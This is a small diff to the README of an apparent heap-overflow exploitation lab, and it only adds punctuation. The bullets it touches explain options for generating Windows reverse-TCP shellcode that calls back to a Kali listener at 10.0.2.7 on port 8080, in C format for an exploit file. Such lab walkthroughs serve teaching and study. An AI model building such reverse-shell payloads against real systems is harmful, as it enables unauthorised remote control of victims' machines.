DaintyJet/Heap-Overflow-Example/README.md

     * `-a x86`: Generate the shellcode for a x86 32 bit architecture.
     * `--platform Windows`: Generate the shellcode for a Windows machine.
     * `-p `: Payload we are generating shellcode for.
-        * `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
+        * `windows/shell_reverse_tcp`: Reverse TCP payload for Windows.
-        * `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7
+        * `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7.
-        * `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080
+        * `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080.
-        * `EXITFUNC=process`: Use the process exit function
+        * `EXITFUNC=process`: Use the process exit function.
     * `-f c`: Output in a format useable in C code.
     * `-v SHELL`: Specify SHELL as the variable name.
 3. Compile [Exploit2-2.cpp](./SourceCode/Exploit/exploit2-2.cpp) with the following command: